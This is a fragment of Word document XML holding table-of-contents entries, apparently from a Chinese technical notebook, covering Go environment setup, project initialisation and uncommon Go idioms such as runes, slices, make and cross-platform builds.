            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779743" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>环境准备</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779743 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>217</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34CD9B90" w14:textId="27DFDE6B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779744" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>下载</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779744 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>217</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4ED5A1E1" w14:textId="465D25F2" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779745" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>设置代理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779745 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>217</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74B001E9" w14:textId="476D012F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779746" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>初始化项目流程</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779746 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>217</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F464B4C" w14:textId="79AFEB77" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779747" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Go</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的不常见写法</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779747 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>217</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66C35BA1" w14:textId="32DF2939" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779748" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>rune</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779748 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>218</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F9F1217" w14:textId="568659D7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779749" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>除运算时只得到</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779749 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>218</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4485FE0E" w14:textId="287C303A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779750" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>引入包的重命名</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779750 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>219</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6370491C" w14:textId="477B8F5B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779751" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>slice</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>...</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779751 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>220</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65B191D5" w14:textId="03AE9829" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779752" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>如何使用全局变量：避免</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>not used</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>报错</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779752 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>220</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68349056" w14:textId="7CF32FBC" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779753" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>切片变量名</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>...</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>拆分成各个元素</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779753 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>222</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43922C07" w14:textId="62FEDF7F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779754" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>引擎的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779754 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>222</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59AFDAE3" w14:textId="59AD7E63" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779755" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Len()</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>cap()</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的关系</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779755 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>223</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A6D2835" w14:textId="3AFF9AB7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779756" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>make</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>只支持</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>slices,maps,channels</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779756 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>225</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58AC48C0" w14:textId="1D7926A1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779757" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>集合中统计次数：例</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>gitleaks</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>计算熵值统计字符串出现字符概率</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779757 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>228</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="646FE33C" w14:textId="1E736A14" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779758" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>golang</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>没有构造函数和析构函数，通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github.com/thecxx/jarvis</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>模拟</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779758 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>229</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="336D6DCF" w14:textId="72B0D355" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779759" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>跨平台打包</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
